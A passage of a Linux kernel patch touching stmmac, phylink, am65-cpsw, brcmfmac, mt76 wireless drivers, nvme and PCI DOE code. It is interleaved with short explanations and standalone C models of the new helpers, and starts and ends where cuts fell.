+@@ -251,7 +251,6 @@ static void intel_speed_mode_2500(struct net_device *ndev, void *intel_data)
+ 		priv->plat->mdio_bus_data->xpcs_an_inband = false;
+ 	} else {
+ 		priv->plat->max_speed = 1000;
+-		priv->plat->mdio_bus_data->xpcs_an_inband = true;
+ 	}
+ }
+ 
+diff --git a/drivers/net/ethernet/stmicro/stmmac/stmmac_main.c b/drivers/net/ethernet/stmicro/stmmac/stmmac_main.c
+index 7389718b4797b..014ce97f96b15 100644
+--- a/drivers/net/ethernet/stmicro/stmmac/stmmac_main.c
++++ b/drivers/net/ethernet/stmicro/stmmac/stmmac_main.c
+@@ -1134,20 +1134,26 @@ static void stmmac_check_pcs_mode(struct stmmac_priv *priv)
+ static int stmmac_init_phy(struct net_device *dev)
+ {
+ 	struct stmmac_priv *priv = netdev_priv(dev);
++	struct fwnode_handle *phy_fwnode;
+ 	struct fwnode_handle *fwnode;
+ 	int ret;
+ 
++	if (!phylink_expects_phy(priv->phylink))
++		return 0;
++
+ 	fwnode = of_fwnode_handle(priv->plat->phylink_node);
+ 	if (!fwnode)
+ 		fwnode = dev_fwnode(priv->device);
+ 
+ 	if (fwnode)
+-		ret = phylink_fwnode_phy_connect(priv->phylink, fwnode, 0);
++		phy_fwnode = fwnode_get_phy_node(fwnode);
++	else
++		phy_fwnode = NULL;
+ 
+ 	/* Some DT bindings do not set-up the PHY handle. Let's try to
+ 	 * manually parse it
+ 	 */
+-	if (!fwnode || ret) {
++	if (!phy_fwnode || IS_ERR(phy_fwnode)) {
+ 		int addr = priv->plat->phy_addr;
+ 		struct phy_device *phydev;
+ 
+@@ -1163,6 +1169,9 @@ static int stmmac_init_phy(struct net_device *dev)
+ 		}
+ 
+ 		ret = phylink_connect_phy(priv->phylink, phydev);
++	} else {
++		fwnode_handle_put(phy_fwnode);
++		ret = phylink_fwnode_phy_connect(priv->phylink, fwnode, 0);
+ 	}
+ 
+ 	if (!priv->plat->pmt) {
+@@ -6620,6 +6629,8 @@ int stmmac_xdp_open(struct net_device *dev)
+ 		goto init_error;
+ 	}
+ 
++	stmmac_reset_queues_param(priv);
++
+ 	/* DMA CSR Channel configuration */
+ 	for (chan = 0; chan < dma_csr_ch; chan++) {
+ 		stmmac_init_chan(priv, priv->ioaddr, priv->plat->dma_cfg, chan);
+@@ -6946,7 +6957,7 @@ static void stmmac_napi_del(struct net_device *dev)
+ int stmmac_reinit_queues(struct net_device *dev, u32 rx_cnt, u32 tx_cnt)
+ {
+ 	struct stmmac_priv *priv = netdev_priv(dev);
+-	int ret = 0;
++	int ret = 0, i;
+ 
+ 	if (netif_running(dev))
+ 		stmmac_release(dev);
+@@ -6955,6 +6966,10 @@ int stmmac_reinit_queues(struct net_device *dev, u32 rx_cnt, u32 tx_cnt)
+ 
+ 	priv->plat->rx_queues_to_use = rx_cnt;
+ 	priv->plat->tx_queues_to_use = tx_cnt;
++	if (!netif_is_rxfh_configured(dev))
++		for (i = 0; i < ARRAY_SIZE(priv->rss.table); i++)
++			priv->rss.table[i] = ethtool_rxfh_indir_default(i,
++									rx_cnt);
+ 
+ 	stmmac_napi_add(dev);
+ 
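
Re-seeding the RSS table above uses ethtool_rxfh_indir_default(), which spreads the indirection slots round-robin across the active rx queues; the netif_is_rxfh_configured() check preserves a table the user set explicitly. The helper's arithmetic, matching the in-tree inline, standalone:

#include <stdio.h>

static unsigned int rxfh_indir_default(unsigned int index, unsigned int n_rx_rings)
{
	return index % n_rx_rings;   /* round-robin over the rx queues */
}

int main(void)
{
	unsigned int i;

	for (i = 0; i < 8; i++)
		printf("%u ", rxfh_indir_default(i, 3));   /* 0 1 2 0 1 2 0 1 */
	printf("\n");
	return 0;
}
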
+diff --git a/drivers/net/ethernet/ti/am65-cpsw-nuss.c b/drivers/net/ethernet/ti/am65-cpsw-nuss.c
+index 3e17152798554..9286b2b3353e3 100644
+--- a/drivers/net/ethernet/ti/am65-cpsw-nuss.c
++++ b/drivers/net/ethernet/ti/am65-cpsw-nuss.c
+@@ -2854,7 +2854,8 @@ err_free_phylink:
+ 	am65_cpsw_nuss_phylink_cleanup(common);
+ 	am65_cpts_release(common->cpts);
+ err_of_clear:
+-	of_platform_device_destroy(common->mdio_dev, NULL);
++	if (common->mdio_dev)
++		of_platform_device_destroy(common->mdio_dev, NULL);
+ err_pm_clear:
+ 	pm_runtime_put_sync(dev);
+ 	pm_runtime_disable(dev);
+@@ -2883,7 +2884,8 @@ static int am65_cpsw_nuss_remove(struct platform_device *pdev)
+ 	am65_cpsw_nuss_phylink_cleanup(common);
+ 	am65_cpts_release(common->cpts);
+ 
+-	of_platform_device_destroy(common->mdio_dev, NULL);
++	if (common->mdio_dev)
++		of_platform_device_destroy(common->mdio_dev, NULL);
+ 
+ 	pm_runtime_put_sync(&pdev->dev);
+ 	pm_runtime_disable(&pdev->dev);
+diff --git a/drivers/net/phy/phylink.c b/drivers/net/phy/phylink.c
+index 4d2519cdb8012..bf8a8ed5d5d7b 100644
+--- a/drivers/net/phy/phylink.c
++++ b/drivers/net/phy/phylink.c
+@@ -1571,6 +1571,25 @@ void phylink_destroy(struct phylink *pl)
+ }
+ EXPORT_SYMBOL_GPL(phylink_destroy);
+ 
++/**
++ * phylink_expects_phy() - Determine if phylink expects a phy to be attached
++ * @pl: a pointer to a &struct phylink returned from phylink_create()
++ *
++ * When using fixed-link mode, or in-band mode with 1000base-X or 2500base-X,
++ * no PHY is needed.
++ *
++ * Returns true if phylink will be expecting a PHY.
++ */
++bool phylink_expects_phy(struct phylink *pl)
++{
++	if (pl->cfg_link_an_mode == MLO_AN_FIXED ||
++	    (pl->cfg_link_an_mode == MLO_AN_INBAND &&
++	     phy_interface_mode_is_8023z(pl->link_config.interface)))
++		return false;
++	return true;
++}
++EXPORT_SYMBOL_GPL(phylink_expects_phy);
++
+ static void phylink_phy_change(struct phy_device *phydev, bool up)
+ {
+ 	struct phylink *pl = phydev->phylink;
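
phylink_expects_phy() lets MAC drivers skip PHY attach for link modes that run without one; the stmmac hunk earlier in this patch calls it at the top of stmmac_init_phy(). A standalone model of the predicate:

#include <stdbool.h>
#include <stdio.h>

enum an_mode { AN_PHY, AN_FIXED, AN_INBAND };
enum iface { IFACE_SGMII, IFACE_1000BASEX, IFACE_2500BASEX };

/* fixed-link, and 802.3z in-band links (1000base-X / 2500base-X),
 * run without a PHY
 */
static bool expects_phy(enum an_mode mode, enum iface iface)
{
	if (mode == AN_FIXED ||
	    (mode == AN_INBAND &&
	     (iface == IFACE_1000BASEX || iface == IFACE_2500BASEX)))
		return false;
	return true;
}

int main(void)
{
	printf("%d %d\n", expects_phy(AN_PHY, IFACE_SGMII),
	       expects_phy(AN_INBAND, IFACE_2500BASEX));   /* 1 0 */
	return 0;
}
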
+diff --git a/drivers/net/wireless/broadcom/brcm80211/brcmfmac/bcmsdh.c b/drivers/net/wireless/broadcom/brcm80211/brcmfmac/bcmsdh.c
+index b7c918f241c91..65d4799a56584 100644
+--- a/drivers/net/wireless/broadcom/brcm80211/brcmfmac/bcmsdh.c
++++ b/drivers/net/wireless/broadcom/brcm80211/brcmfmac/bcmsdh.c
+@@ -994,15 +994,34 @@ static const struct sdio_device_id brcmf_sdmmc_ids[] = {
+ MODULE_DEVICE_TABLE(sdio, brcmf_sdmmc_ids);
+ 
+ 
+-static void brcmf_sdiod_acpi_set_power_manageable(struct device *dev,
+-						  int val)
++static void brcmf_sdiod_acpi_save_power_manageable(struct brcmf_sdio_dev *sdiodev)
+ {
+ #if IS_ENABLED(CONFIG_ACPI)
+ 	struct acpi_device *adev;
+ 
+-	adev = ACPI_COMPANION(dev);
++	adev = ACPI_COMPANION(&sdiodev->func1->dev);
+ 	if (adev)
+-		adev->flags.power_manageable = 0;
++		sdiodev->func1_power_manageable = adev->flags.power_manageable;
++
++	adev = ACPI_COMPANION(&sdiodev->func2->dev);
++	if (adev)
++		sdiodev->func2_power_manageable = adev->flags.power_manageable;
++#endif
++}
++
++static void brcmf_sdiod_acpi_set_power_manageable(struct brcmf_sdio_dev *sdiodev,
++						  int enable)
++{
++#if IS_ENABLED(CONFIG_ACPI)
++	struct acpi_device *adev;
++
++	adev = ACPI_COMPANION(&sdiodev->func1->dev);
++	if (adev)
++		adev->flags.power_manageable = enable ? sdiodev->func1_power_manageable : 0;
++
++	adev = ACPI_COMPANION(&sdiodev->func2->dev);
++	if (adev)
++		adev->flags.power_manageable = enable ? sdiodev->func2_power_manageable : 0;
+ #endif
+ }
+ 
+@@ -1012,7 +1031,6 @@ static int brcmf_ops_sdio_probe(struct sdio_func *func,
+ 	int err;
+ 	struct brcmf_sdio_dev *sdiodev;
+ 	struct brcmf_bus *bus_if;
+-	struct device *dev;
+ 
+ 	brcmf_dbg(SDIO, "Enter\n");
+ 	brcmf_dbg(SDIO, "Class=%x\n", func->class);
+@@ -1020,14 +1038,9 @@ static int brcmf_ops_sdio_probe(struct sdio_func *func,
+ 	brcmf_dbg(SDIO, "sdio device ID: 0x%04x\n", func->device);
+ 	brcmf_dbg(SDIO, "Function#: %d\n", func->num);
+ 
+-	dev = &func->dev;
+-
+ 	/* Set MMC_QUIRK_LENIENT_FN0 for this card */
+ 	func->card->quirks |= MMC_QUIRK_LENIENT_FN0;
+ 
+-	/* prohibit ACPI power management for this device */
+-	brcmf_sdiod_acpi_set_power_manageable(dev, 0);
+-
+ 	/* Consume func num 1 but dont do anything with it. */
+ 	if (func->num == 1)
+ 		return 0;
+@@ -1059,6 +1072,7 @@ static int brcmf_ops_sdio_probe(struct sdio_func *func,
+ 	dev_set_drvdata(&sdiodev->func1->dev, bus_if);
+ 	sdiodev->dev = &sdiodev->func1->dev;
+ 
++	brcmf_sdiod_acpi_save_power_manageable(sdiodev);
+ 	brcmf_sdiod_change_state(sdiodev, BRCMF_SDIOD_DOWN);
+ 
+ 	brcmf_dbg(SDIO, "F2 found, calling brcmf_sdiod_probe...\n");
+@@ -1124,6 +1138,8 @@ void brcmf_sdio_wowl_config(struct device *dev, bool enabled)
+ 
+ 	if (sdiodev->settings->bus.sdio.oob_irq_supported ||
+ 	    pm_caps & MMC_PM_WAKE_SDIO_IRQ) {
++		/* Stop ACPI from turning off the device when wowl is enabled */
++		brcmf_sdiod_acpi_set_power_manageable(sdiodev, !enabled);
+ 		sdiodev->wowl_enabled = enabled;
+ 		brcmf_dbg(SDIO, "Configuring WOWL, enabled=%d\n", enabled);
+ 		return;
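The brcmfmac change replaces the old probe-time clearing of ACPI's power_manageable flag with a save/restore pair keyed to WoWLAN: the original flags are captured once at probe, forced off while wake-on-wireless is armed, and restored otherwise. The pattern, reduced to its essentials (names invented; the real code tracks two SDIO functions):

/* 'saved' stands in for funcN_power_manageable above. */
static bool saved;

static void pm_flag_save(bool current_flag)
{
	saved = current_flag;		/* remember ACPI's default */
}

static bool pm_flag_for_state(bool wowl_enabled)
{
	/* WoWLAN armed: ACPI must not power the card down;
	 * otherwise restore whatever ACPI originally advertised.
	 */
	return wowl_enabled ? false : saved;
}
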
+diff --git a/drivers/net/wireless/broadcom/brcm80211/brcmfmac/sdio.h b/drivers/net/wireless/broadcom/brcm80211/brcmfmac/sdio.h
+index b76d34d36bde6..0d18ed15b4032 100644
+--- a/drivers/net/wireless/broadcom/brcm80211/brcmfmac/sdio.h
++++ b/drivers/net/wireless/broadcom/brcm80211/brcmfmac/sdio.h
+@@ -188,6 +188,8 @@ struct brcmf_sdio_dev {
+ 	char nvram_name[BRCMF_FW_NAME_LEN];
+ 	char clm_name[BRCMF_FW_NAME_LEN];
+ 	bool wowl_enabled;
++	bool func1_power_manageable;
++	bool func2_power_manageable;
+ 	enum brcmf_sdiod_state state;
+ 	struct brcmf_sdiod_freezer *freezer;
+ 	const struct firmware *clm_fw;
+diff --git a/drivers/net/wireless/mediatek/mt76/mt7603/main.c b/drivers/net/wireless/mediatek/mt76/mt7603/main.c
+index ca50feb0b3a9d..1b1358c6bb464 100644
+--- a/drivers/net/wireless/mediatek/mt76/mt7603/main.c
++++ b/drivers/net/wireless/mediatek/mt76/mt7603/main.c
+@@ -512,15 +512,15 @@ mt7603_set_key(struct ieee80211_hw *hw, enum set_key_cmd cmd,
+ 	    !(key->flags & IEEE80211_KEY_FLAG_PAIRWISE))
+ 		return -EOPNOTSUPP;
+ 
+-	if (cmd == SET_KEY) {
+-		key->hw_key_idx = wcid->idx;
+-		wcid->hw_key_idx = idx;
+-	} else {
++	if (cmd != SET_KEY) {
+ 		if (idx == wcid->hw_key_idx)
+ 			wcid->hw_key_idx = -1;
+ 
+-		key = NULL;
++		return 0;
+ 	}
++
++	key->hw_key_idx = wcid->idx;
++	wcid->hw_key_idx = idx;
+ 	mt76_wcid_key_setup(&dev->mt76, wcid, key);
+ 
+ 	return mt7603_wtbl_set_key(dev, wcid->idx, key);
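This and the sibling mt76 hunks below all apply the same refactor: key removal takes an early return after clearing the bookkeeping, so the tail of the function (mt76_wcid_key_setup() and the hardware write) only ever runs with a real key instead of a NULL one. The shape of the change, with generic names:

/* Guard-clause form used across the mt76 set_key paths. */
if (cmd != SET_KEY) {
	if (idx == wcid->hw_key_idx)
		wcid->hw_key_idx = -1;	/* forget the removed key */
	return 0;			/* nothing to program */
}
/* from here on, 'key' is valid and cmd == SET_KEY */
key->hw_key_idx = wcid->idx;
wcid->hw_key_idx = idx;
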
+diff --git a/drivers/net/wireless/mediatek/mt76/mt7615/mac.c b/drivers/net/wireless/mediatek/mt76/mt7615/mac.c
+index a95602473359e..51a968a6afdc9 100644
+--- a/drivers/net/wireless/mediatek/mt76/mt7615/mac.c
++++ b/drivers/net/wireless/mediatek/mt76/mt7615/mac.c
+@@ -1193,8 +1193,7 @@ EXPORT_SYMBOL_GPL(mt7615_mac_enable_rtscts);
+ static int
+ mt7615_mac_wtbl_update_key(struct mt7615_dev *dev, struct mt76_wcid *wcid,
+ 			   struct ieee80211_key_conf *key,
+-			   enum mt76_cipher_type cipher, u16 cipher_mask,
+-			   enum set_key_cmd cmd)
++			   enum mt76_cipher_type cipher, u16 cipher_mask)
+ {
+ 	u32 addr = mt7615_mac_wtbl_addr(dev, wcid->idx) + 30 * 4;
+ 	u8 data[32] = {};
+@@ -1203,27 +1202,18 @@ mt7615_mac_wtbl_update_key(struct mt7615_dev *dev, struct mt76_wcid *wcid,
+ 		return -EINVAL;
+ 
+ 	mt76_rr_copy(dev, addr, data, sizeof(data));
+-	if (cmd == SET_KEY) {
+-		if (cipher == MT_CIPHER_TKIP) {
+-			/* Rx/Tx MIC keys are swapped */
+-			memcpy(data, key->key, 16);
+-			memcpy(data + 16, key->key + 24, 8);
+-			memcpy(data + 24, key->key + 16, 8);
+-		} else {
+-			if (cipher_mask == BIT(cipher))
+-				memcpy(data, key->key, key->keylen);
+-			else if (cipher != MT_CIPHER_BIP_CMAC_128)
+-				memcpy(data, key->key, 16);
+-			if (cipher == MT_CIPHER_BIP_CMAC_128)
+-				memcpy(data + 16, key->key, 16);
+-		}
++	if (cipher == MT_CIPHER_TKIP) {
++		/* Rx/Tx MIC keys are swapped */
++		memcpy(data, key->key, 16);
++		memcpy(data + 16, key->key + 24, 8);
++		memcpy(data + 24, key->key + 16, 8);
+ 	} else {
++		if (cipher_mask == BIT(cipher))
++			memcpy(data, key->key, key->keylen);
++		else if (cipher != MT_CIPHER_BIP_CMAC_128)
++			memcpy(data, key->key, 16);
+ 		if (cipher == MT_CIPHER_BIP_CMAC_128)
+-			memset(data + 16, 0, 16);
+-		else if (cipher_mask)
+-			memset(data, 0, 16);
+-		if (!cipher_mask)
+-			memset(data, 0, sizeof(data));
++			memcpy(data + 16, key->key, 16);
+ 	}
+ 
+ 	mt76_wr_copy(dev, addr, data, sizeof(data));
+@@ -1234,7 +1224,7 @@ mt7615_mac_wtbl_update_key(struct mt7615_dev *dev, struct mt76_wcid *wcid,
+ static int
+ mt7615_mac_wtbl_update_pk(struct mt7615_dev *dev, struct mt76_wcid *wcid,
+ 			  enum mt76_cipher_type cipher, u16 cipher_mask,
+-			  int keyidx, enum set_key_cmd cmd)
++			  int keyidx)
+ {
+ 	u32 addr = mt7615_mac_wtbl_addr(dev, wcid->idx), w0, w1;
+ 
+@@ -1253,9 +1243,7 @@ mt7615_mac_wtbl_update_pk(struct mt7615_dev *dev, struct mt76_wcid *wcid,
+ 	else
+ 		w0 &= ~MT_WTBL_W0_RX_IK_VALID;
+ 
+-	if (cmd == SET_KEY &&
+-	    (cipher != MT_CIPHER_BIP_CMAC_128 ||
+-	     cipher_mask == BIT(cipher))) {
++	if (cipher != MT_CIPHER_BIP_CMAC_128 || cipher_mask == BIT(cipher)) {
+ 		w0 &= ~MT_WTBL_W0_KEY_IDX;
+ 		w0 |= FIELD_PREP(MT_WTBL_W0_KEY_IDX, keyidx);
+ 	}
+@@ -1272,19 +1260,10 @@ mt7615_mac_wtbl_update_pk(struct mt7615_dev *dev, struct mt76_wcid *wcid,
+ 
+ static void
+ mt7615_mac_wtbl_update_cipher(struct mt7615_dev *dev, struct mt76_wcid *wcid,
+-			      enum mt76_cipher_type cipher, u16 cipher_mask,
+-			      enum set_key_cmd cmd)
++			      enum mt76_cipher_type cipher, u16 cipher_mask)
+ {
+ 	u32 addr = mt7615_mac_wtbl_addr(dev, wcid->idx);
+ 
+-	if (!cipher_mask) {
+-		mt76_clear(dev, addr + 2 * 4, MT_WTBL_W2_KEY_TYPE);
+-		return;
+-	}
+-
+-	if (cmd != SET_KEY)
+-		return;
+-
+ 	if (cipher == MT_CIPHER_BIP_CMAC_128 &&
+ 	    cipher_mask & ~BIT(MT_CIPHER_BIP_CMAC_128))
+ 		return;
+@@ -1295,8 +1274,7 @@ mt7615_mac_wtbl_update_cipher(struct mt7615_dev *dev, struct mt76_wcid *wcid,
+ 
+ int __mt7615_mac_wtbl_set_key(struct mt7615_dev *dev,
+ 			      struct mt76_wcid *wcid,
+-			      struct ieee80211_key_conf *key,
+-			      enum set_key_cmd cmd)
++			      struct ieee80211_key_conf *key)
+ {
+ 	enum mt76_cipher_type cipher;
+ 	u16 cipher_mask = wcid->cipher;
+@@ -1306,19 +1284,14 @@ int __mt7615_mac_wtbl_set_key(struct mt7615_dev *dev,
+ 	if (cipher == MT_CIPHER_NONE)
+ 		return -EOPNOTSUPP;
+ 
+-	if (cmd == SET_KEY)
+-		cipher_mask |= BIT(cipher);
+-	else
+-		cipher_mask &= ~BIT(cipher);
+-
+-	mt7615_mac_wtbl_update_cipher(dev, wcid, cipher, cipher_mask, cmd);
+-	err = mt7615_mac_wtbl_update_key(dev, wcid, key, cipher, cipher_mask,
+-					 cmd);
++	cipher_mask |= BIT(cipher);
++	mt7615_mac_wtbl_update_cipher(dev, wcid, cipher, cipher_mask);
++	err = mt7615_mac_wtbl_update_key(dev, wcid, key, cipher, cipher_mask);
+ 	if (err < 0)
+ 		return err;
+ 
+ 	err = mt7615_mac_wtbl_update_pk(dev, wcid, cipher, cipher_mask,
+-					key->keyidx, cmd);
++					key->keyidx);
+ 	if (err < 0)
+ 		return err;
+ 
+@@ -1329,13 +1302,12 @@ int __mt7615_mac_wtbl_set_key(struct mt7615_dev *dev,
+ 
+ int mt7615_mac_wtbl_set_key(struct mt7615_dev *dev,
+ 			    struct mt76_wcid *wcid,
+-			    struct ieee80211_key_conf *key,
+-			    enum set_key_cmd cmd)
++			    struct ieee80211_key_conf *key)
+ {
+ 	int err;
+ 
+ 	spin_lock_bh(&dev->mt76.lock);
+-	err = __mt7615_mac_wtbl_set_key(dev, wcid, key, cmd);
++	err = __mt7615_mac_wtbl_set_key(dev, wcid, key);
+ 	spin_unlock_bh(&dev->mt76.lock);
+ 
+ 	return err;
+diff --git a/drivers/net/wireless/mediatek/mt76/mt7615/main.c b/drivers/net/wireless/mediatek/mt76/mt7615/main.c
+index ab4c1b4478aa9..dadb13f2ca095 100644
+--- a/drivers/net/wireless/mediatek/mt76/mt7615/main.c
++++ b/drivers/net/wireless/mediatek/mt76/mt7615/main.c
+@@ -391,18 +391,17 @@ static int mt7615_set_key(struct ieee80211_hw *hw, enum set_key_cmd cmd,
+ 
+ 	if (cmd == SET_KEY)
+ 		*wcid_keyidx = idx;
+-	else if (idx == *wcid_keyidx)
+-		*wcid_keyidx = -1;
+-	else
++	else {
++		if (idx == *wcid_keyidx)
++			*wcid_keyidx = -1;
+ 		goto out;
++	}
+ 
+-	mt76_wcid_key_setup(&dev->mt76, wcid,
+-			    cmd == SET_KEY ? key : NULL);
+-
++	mt76_wcid_key_setup(&dev->mt76, wcid, key);
+ 	if (mt76_is_mmio(&dev->mt76))
+-		err = mt7615_mac_wtbl_set_key(dev, wcid, key, cmd);
++		err = mt7615_mac_wtbl_set_key(dev, wcid, key);
+ 	else
+-		err = __mt7615_mac_wtbl_set_key(dev, wcid, key, cmd);
++		err = __mt7615_mac_wtbl_set_key(dev, wcid, key);
+ 
+ out:
+ 	mt7615_mutex_release(dev);
+diff --git a/drivers/net/wireless/mediatek/mt76/mt7615/mt7615.h b/drivers/net/wireless/mediatek/mt76/mt7615/mt7615.h
+index 087d4886162e6..ab10ad0ecdedd 100644
+--- a/drivers/net/wireless/mediatek/mt76/mt7615/mt7615.h
++++ b/drivers/net/wireless/mediatek/mt76/mt7615/mt7615.h
+@@ -484,11 +484,9 @@ int mt7615_mac_write_txwi(struct mt7615_dev *dev, __le32 *txwi,
+ void mt7615_mac_set_timing(struct mt7615_phy *phy);
+ int __mt7615_mac_wtbl_set_key(struct mt7615_dev *dev,
+ 			      struct mt76_wcid *wcid,
+-			      struct ieee80211_key_conf *key,
+-			      enum set_key_cmd cmd);
++			      struct ieee80211_key_conf *key);
+ int mt7615_mac_wtbl_set_key(struct mt7615_dev *dev, struct mt76_wcid *wcid,
+-			    struct ieee80211_key_conf *key,
+-			    enum set_key_cmd cmd);
++			    struct ieee80211_key_conf *key);
+ void mt7615_mac_reset_work(struct work_struct *work);
+ u32 mt7615_mac_get_sta_tid_sn(struct mt7615_dev *dev, int wcid, u8 tid);
+ 
+diff --git a/drivers/net/wireless/mediatek/mt76/mt76x02_util.c b/drivers/net/wireless/mediatek/mt76/mt76x02_util.c
+index 604ddcc211231..324535a0dd6d4 100644
+--- a/drivers/net/wireless/mediatek/mt76/mt76x02_util.c
++++ b/drivers/net/wireless/mediatek/mt76/mt76x02_util.c
+@@ -455,20 +455,20 @@ int mt76x02_set_key(struct ieee80211_hw *hw, enum set_key_cmd cmd,
+ 	msta = sta ? (struct mt76x02_sta *)sta->drv_priv : NULL;
+ 	wcid = msta ? &msta->wcid : &mvif->group_wcid;
+ 
+-	if (cmd == SET_KEY) {
+-		key->hw_key_idx = wcid->idx;
+-		wcid->hw_key_idx = idx;
+-		if (key->flags & IEEE80211_KEY_FLAG_RX_MGMT) {
+-			key->flags |= IEEE80211_KEY_FLAG_SW_MGMT_TX;
+-			wcid->sw_iv = true;
+-		}
+-	} else {
++	if (cmd != SET_KEY) {
+ 		if (idx == wcid->hw_key_idx) {
+ 			wcid->hw_key_idx = -1;
+ 			wcid->sw_iv = false;
+ 		}
+ 
+-		key = NULL;
++		return 0;
++	}
++
++	key->hw_key_idx = wcid->idx;
++	wcid->hw_key_idx = idx;
++	if (key->flags & IEEE80211_KEY_FLAG_RX_MGMT) {
++		key->flags |= IEEE80211_KEY_FLAG_SW_MGMT_TX;
++		wcid->sw_iv = true;
+ 	}
+ 	mt76_wcid_key_setup(&dev->mt76, wcid, key);
+ 
+diff --git a/drivers/net/wireless/mediatek/mt76/mt7915/main.c b/drivers/net/wireless/mediatek/mt76/mt7915/main.c
+index 7589af4b3dab7..06c1045177e24 100644
+--- a/drivers/net/wireless/mediatek/mt76/mt7915/main.c
++++ b/drivers/net/wireless/mediatek/mt76/mt7915/main.c
+@@ -410,16 +410,15 @@ static int mt7915_set_key(struct ieee80211_hw *hw, enum set_key_cmd cmd,
+ 		mt7915_mcu_add_bss_info(phy, vif, true);
+ 	}
+ 
+-	if (cmd == SET_KEY)
++	if (cmd == SET_KEY) {
+ 		*wcid_keyidx = idx;
+-	else if (idx == *wcid_keyidx)
+-		*wcid_keyidx = -1;
+-	else
++	} else {
++		if (idx == *wcid_keyidx)
++			*wcid_keyidx = -1;
+ 		goto out;
++	}
+ 
+-	mt76_wcid_key_setup(&dev->mt76, wcid,
+-			    cmd == SET_KEY ? key : NULL);
+-
++	mt76_wcid_key_setup(&dev->mt76, wcid, key);
+ 	err = mt76_connac_mcu_add_key(&dev->mt76, vif, &msta->bip,
+ 				      key, MCU_EXT_CMD(STA_REC_UPDATE),
+ 				      &msta->wcid, cmd);
+diff --git a/drivers/net/wireless/mediatek/mt76/mt7921/main.c b/drivers/net/wireless/mediatek/mt76/mt7921/main.c
+index cdb0d61903935..744382be36f8b 100644
+--- a/drivers/net/wireless/mediatek/mt76/mt7921/main.c
++++ b/drivers/net/wireless/mediatek/mt76/mt7921/main.c
+@@ -569,16 +569,15 @@ static int mt7921_set_key(struct ieee80211_hw *hw, enum set_key_cmd cmd,
+ 
+ 	mt7921_mutex_acquire(dev);
+ 
+-	if (cmd == SET_KEY)
++	if (cmd == SET_KEY) {
+ 		*wcid_keyidx = idx;
+-	else if (idx == *wcid_keyidx)
+-		*wcid_keyidx = -1;
+-	else
++	} else {
++		if (idx == *wcid_keyidx)
++			*wcid_keyidx = -1;
+ 		goto out;
++	}
+ 
+-	mt76_wcid_key_setup(&dev->mt76, wcid,
+-			    cmd == SET_KEY ? key : NULL);
+-
++	mt76_wcid_key_setup(&dev->mt76, wcid, key);
+ 	err = mt76_connac_mcu_add_key(&dev->mt76, vif, &msta->bip,
+ 				      key, MCU_UNI_CMD(STA_REC_UPDATE),
+ 				      &msta->wcid, cmd);
+diff --git a/drivers/net/wireless/mediatek/mt76/mt7921/pci.c b/drivers/net/wireless/mediatek/mt76/mt7921/pci.c
+index cb72ded372564..5c23c827abe47 100644
+--- a/drivers/net/wireless/mediatek/mt76/mt7921/pci.c
++++ b/drivers/net/wireless/mediatek/mt76/mt7921/pci.c
+@@ -20,7 +20,7 @@ static const struct pci_device_id mt7921_pci_device_table[] = {
+ 	{ PCI_DEVICE(PCI_VENDOR_ID_MEDIATEK, 0x0608),
+ 		.driver_data = (kernel_ulong_t)MT7921_FIRMWARE_WM },
+ 	{ PCI_DEVICE(PCI_VENDOR_ID_MEDIATEK, 0x0616),
+-		.driver_data = (kernel_ulong_t)MT7921_FIRMWARE_WM },
++		.driver_data = (kernel_ulong_t)MT7922_FIRMWARE_WM },
+ 	{ },
+ };
+ 
+diff --git a/drivers/net/wireless/mediatek/mt76/mt7996/main.c b/drivers/net/wireless/mediatek/mt76/mt7996/main.c
+index c423b052e4f4c..2734aae5449b1 100644
+--- a/drivers/net/wireless/mediatek/mt76/mt7996/main.c
++++ b/drivers/net/wireless/mediatek/mt76/mt7996/main.c
+@@ -351,16 +351,15 @@ static int mt7996_set_key(struct ieee80211_hw *hw, enum set_key_cmd cmd,
+ 		mt7996_mcu_add_bss_info(phy, vif, true);
+ 	}
+ 
+-	if (cmd == SET_KEY)
++	if (cmd == SET_KEY) {
+ 		*wcid_keyidx = idx;
+-	else if (idx == *wcid_keyidx)
+-		*wcid_keyidx = -1;
+-	else
++	} else {
++		if (idx == *wcid_keyidx)
++			*wcid_keyidx = -1;
+ 		goto out;
++	}
+ 
+-	mt76_wcid_key_setup(&dev->mt76, wcid,
+-			    cmd == SET_KEY ? key : NULL);
+-
++	mt76_wcid_key_setup(&dev->mt76, wcid, key);
+ 	err = mt7996_mcu_add_key(&dev->mt76, vif, &msta->bip,
+ 				 key, MCU_WMWA_UNI_CMD(STA_REC_UPDATE),
+ 				 &msta->wcid, cmd);
+diff --git a/drivers/nvme/host/core.c b/drivers/nvme/host/core.c
+index 70b5e891f6b3b..ee1b075d12cfc 100644
+--- a/drivers/nvme/host/core.c
++++ b/drivers/nvme/host/core.c
+@@ -1717,6 +1717,9 @@ static void nvme_config_discard(struct gendisk *disk, struct nvme_ns *ns)
+ 	struct request_queue *queue = disk->queue;
+ 	u32 size = queue_logical_block_size(queue);
+ 
++	if (ctrl->dmrsl && ctrl->dmrsl <= nvme_sect_to_lba(ns, UINT_MAX))
++		ctrl->max_discard_sectors = nvme_lba_to_sect(ns, ctrl->dmrsl);
++
+ 	if (ctrl->max_discard_sectors == 0) {
+ 		blk_queue_max_discard_sectors(queue, 0);
+ 		return;
+@@ -1731,9 +1734,6 @@ static void nvme_config_discard(struct gendisk *disk, struct nvme_ns *ns)
+ 	if (queue->limits.max_discard_sectors)
+ 		return;
+ 
+-	if (ctrl->dmrsl && ctrl->dmrsl <= nvme_sect_to_lba(ns, UINT_MAX))
+-		ctrl->max_discard_sectors = nvme_lba_to_sect(ns, ctrl->dmrsl);
+-
+ 	blk_queue_max_discard_sectors(queue, ctrl->max_discard_sectors);
+ 	blk_queue_max_discard_segments(queue, ctrl->max_discard_segments);
+ 
+diff --git a/drivers/pci/doe.c b/drivers/pci/doe.c
+index 66d9ab2886468..e5e9b287b9766 100644
+--- a/drivers/pci/doe.c
++++ b/drivers/pci/doe.c
+@@ -128,7 +128,7 @@ static int pci_doe_send_req(struct pci_doe_mb *doe_mb,
+ 		return -EIO;
+ 
+ 	/* Length is 2 DW of header + length of payload in DW */
+-	length = 2 + task->request_pl_sz / sizeof(u32);
++	length = 2 + task->request_pl_sz / sizeof(__le32);
+ 	if (length > PCI_DOE_MAX_LENGTH)
+ 		return -EIO;
+ 	if (length == PCI_DOE_MAX_LENGTH)
+@@ -141,9 +141,9 @@ static int pci_doe_send_req(struct pci_doe_mb *doe_mb,
+ 	pci_write_config_dword(pdev, offset + PCI_DOE_WRITE,
+ 			       FIELD_PREP(PCI_DOE_DATA_OBJECT_HEADER_2_LENGTH,
+ 					  length));
